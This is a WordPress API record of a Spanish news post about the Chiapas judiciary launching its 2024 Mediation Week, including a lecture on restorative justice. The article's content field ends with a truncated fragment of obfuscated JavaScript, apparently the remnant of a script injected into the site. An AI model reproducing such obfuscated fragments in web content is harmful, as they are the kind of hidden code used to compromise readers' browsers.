{"id":18007,"date":"2024-09-24T04:10:25","date_gmt":"2024-09-24T04:10:25","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18007"},"modified":"2024-09-24T04:10:26","modified_gmt":"2024-09-24T04:10:26","slug":"arranca-en-el-poder-judicial-del-estado-la-semana-de-mediacion-2024","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18007","title":{"rendered":"Arranca en el Poder Judicial del Estado la Semana de Mediaci\u00f3n 2024"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"819\" data-id=\"18008\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.19-PM-1024x819.jpeg\" alt=\"\" class=\"wp-image-18008\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.19-PM-1024x819.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.19-PM-300x240.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.19-PM-768x615.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.19-PM-1536x1229.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.19-PM-2048x1639.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" data-id=\"18009\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.20-PM-3-1024x771.jpeg\" alt=\"\" class=\"wp-image-18009\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.20-PM-3-1024x771.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.20-PM-3-300x226.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.20-PM-3-768x578.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.20-PM-3-1536x1157.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.20-PM-3-2048x1542.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" data-id=\"18010\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.21-PM-1-1024x771.jpeg\" alt=\"\" class=\"wp-image-18010\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.21-PM-1-1024x771.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.21-PM-1-300x226.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.21-PM-1-768x578.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.21-PM-1-1536x1157.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-23-at-4.34.21-PM-1-2048x1542.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>23 de septiembre del 2024. Tuxtla Guti\u00e9rrez.- El Poder Judicial del Estado que encabeza el magistrado presidente, Guillermo Ramos P\u00e9rez, inaugur\u00f3 la Semana de Mediaci\u00f3n 2024 por una Cultura de Paz, en conmemoraci\u00f3n del 13\u00ba aniversario de la implementaci\u00f3n de la Justicia Alternativa en la entidad que es organizado a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial y en coordinaci\u00f3n con el Centro Estatal de Justicia Alternativa.<\/p>\n\n\n\n<p>La Semana de Mediaci\u00f3n, se llevar\u00e1 a cabo en modalidad virtual a trav\u00e9s de Facebook Live y presencial en la Sala de Presidentes del Palacio de Justicia en Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>El evento, inici\u00f3 con la conferencia titulada Errores en la Justicia Restaurativa en M\u00e9xico, impartida por el acad\u00e9mico e investigador, Nimrod Mihael Champo S\u00e1nchez.<\/p>\n\n\n\n<p>Durante su ponencia, abord\u00f3 las fallas comunes en la implementaci\u00f3n de la Justicia Restaurativa dentro del Sistema Penal Acusatorio, se\u00f1alando la falta de capacitaci\u00f3n adecuada para los facilitadores, el desconocimiento de los principios fundamentales de este enfoque y los desaf\u00edos que a\u00fan representa.<\/p>\n\n\n\n<p>Adem\u00e1s, el disertante interactu\u00f3 con las y los asistentes, generando un debate e intercambio de casos sobre la aplicaci\u00f3n de la Justicia Restaurativa en Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 23 de septiembre del 2024. Tuxtla Guti\u00e9rrez.- El Poder Judicial del Estado que encabeza el magistrado presidente, Guillermo Ramos P\u00e9rez, inaugur\u00f3 la Semana de Mediaci\u00f3n 2024 por una Cultura de Paz, en conmemoraci\u00f3n del 13\u00ba aniversario de la implementaci\u00f3n de la Justicia Alternativa en la entidad que es organizado a trav\u00e9s del Instituto de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18008,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-18007","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18007","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18007"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18007\/revisions"}],"predecessor-version":[{"id":18011,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18007\/revisions\/18011"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18008"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18007"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18007"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18007"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}